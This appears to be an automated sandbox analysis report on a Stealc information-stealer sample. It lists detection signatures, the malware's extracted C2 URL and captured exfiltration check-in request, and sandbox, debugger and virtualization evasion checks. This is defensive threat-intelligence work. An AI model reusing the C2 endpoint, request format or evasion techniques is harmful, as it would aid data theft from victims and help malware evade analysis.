Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532109
MD5:ebddc57c042f9c28f78e5d1fa1c75020
SHA1:a3252e4609bde886ed5b96b72a439b18fe5bd9a4
SHA256:c6b0379b9b644a4d5c6cd89d57ace4f95810d31ebf2eb7b9d8310f88c04cfd85
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EBDDC57C042F9C28F78E5D1FA1C75020)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6652JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6652JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.540000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-12T12:14:15.743202+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.540000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0054C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00547240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00549AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00549B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00558EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00544880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--
                Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.1824677690.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpows
                Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37=
                Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37D

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009008160_2_00900816
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090583B0_2_0090583B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FD1230_2_008FD123
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090B1250_2_0090B125
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009072A80_2_009072A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009022EA0_2_009022EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FECB60_2_008FECB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4C360_2_007F4C36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CDC340_2_008CDC34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00908D9E0_2_00908D9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083154B0_2_0083154B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00903D5B0_2_00903D5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D95880_2_007D9588
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00810ECF0_2_00810ECF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6F970_2_007F6F97
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: tjghrrql ZLIB complexity 0.994973742716958
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00553720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3V0P032J.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1825792 > 1048576
                Source: file.exeStatic PE information: Raw size of tjghrrql is bigger than: 0x100000 < 0x197a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bfbfe should be: 0x1cb738
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: tjghrrql
                Source: file.exeStatic PE information: section name: uavtyefl
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B3086 push eax; mov dword ptr [esp], edx0_2_009B30C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A23886 push 4BFB78EBh; mov dword ptr [esp], ebx0_2_00A238C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A23886 push ebx; mov dword ptr [esp], ebp0_2_00A23923
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E0AF push eax; mov dword ptr [esp], 7F978D2Dh0_2_0098E0F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D70C8 push eax; mov dword ptr [esp], 4E265596h0_2_009D71E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D70C8 push 431548ADh; mov dword ptr [esp], ebx0_2_009D7203
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D70C8 push 1A29FD00h; mov dword ptr [esp], eax0_2_009D7390
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BA8C2 push 5B471672h; mov dword ptr [esp], ebx0_2_009BA8EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B035 push ecx; ret 0_2_0055B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091A0E5 push 2C1AF6F5h; mov dword ptr [esp], edx0_2_0091A100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091A0E5 push eax; mov dword ptr [esp], esi0_2_0091A285
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009890E4 push ecx; mov dword ptr [esp], ebp0_2_0098913F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009890E4 push 51F2DC29h; mov dword ptr [esp], edx0_2_00989173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A001A push ecx; mov dword ptr [esp], esi0_2_009A0077
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 59999B0Bh; mov dword ptr [esp], eax0_2_00900844
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push edx; mov dword ptr [esp], 7DB375FCh0_2_00900848
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push edx; mov dword ptr [esp], eax0_2_0090092A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 26F6661Eh; mov dword ptr [esp], ebp0_2_0090099A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push eax; mov dword ptr [esp], 6A8E3E1Bh0_2_00900A36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 2D61EBA9h; mov dword ptr [esp], esi0_2_00900A5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push eax; mov dword ptr [esp], ebx0_2_00900ABA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 7A4BB734h; mov dword ptr [esp], edi0_2_00900AE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push eax; mov dword ptr [esp], edx0_2_00900B4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push esi; mov dword ptr [esp], 5FE58B28h0_2_00900BA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 74597172h; mov dword ptr [esp], edx0_2_00900C21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 1C6FD371h; mov dword ptr [esp], esi0_2_00900C56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push ebp; mov dword ptr [esp], 37DF1CA8h0_2_00900CA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 7A3BF454h; mov dword ptr [esp], ebx0_2_00900CE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push eax; mov dword ptr [esp], ecx0_2_00900CE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 7472B847h; mov dword ptr [esp], ebp0_2_00900D17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900816 push 36E51FF4h; mov dword ptr [esp], ebp0_2_00900D2A
                Source: file.exeStatic PE information: section name: tjghrrql entropy: 7.953395842513043

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13569
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2101 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D259Ah], esi 0x0000000f push dword ptr [ebp+122D0D8Dh] 0x00000015 jng 00007FE83906A39Fh 0x0000001b jmp 00007FE83906A399h 0x00000020 call dword ptr [ebp+122D1F76h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D2373h], esi 0x0000002d xor eax, eax 0x0000002f cmc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 js 00007FE83906A38Ch 0x0000003a xor dword ptr [ebp+122D2594h], eax 0x00000040 add dword ptr [ebp+122D2594h], ecx 0x00000046 mov dword ptr [ebp+122D2CC7h], eax 0x0000004c jmp 00007FE83906A38Fh 0x00000051 add dword ptr [ebp+122D2594h], eax 0x00000057 mov esi, 0000003Ch 0x0000005c mov dword ptr [ebp+122D354Ah], ecx 0x00000062 pushad 0x00000063 add bh, 00000056h 0x00000066 jmp 00007FE83906A392h 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D354Ah], esi 0x00000076 lodsw 0x00000078 jmp 00007FE83906A396h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 stc 0x00000082 jmp 00007FE83906A38Ch 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b sub dword ptr [ebp+122D2373h], edi 0x00000091 nop 0x00000092 jl 00007FE83906A394h 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b jmp 00007FE83906A391h 0x000000a0 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911458 second address: 911463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911463 second address: 911467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911467 second address: 911470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
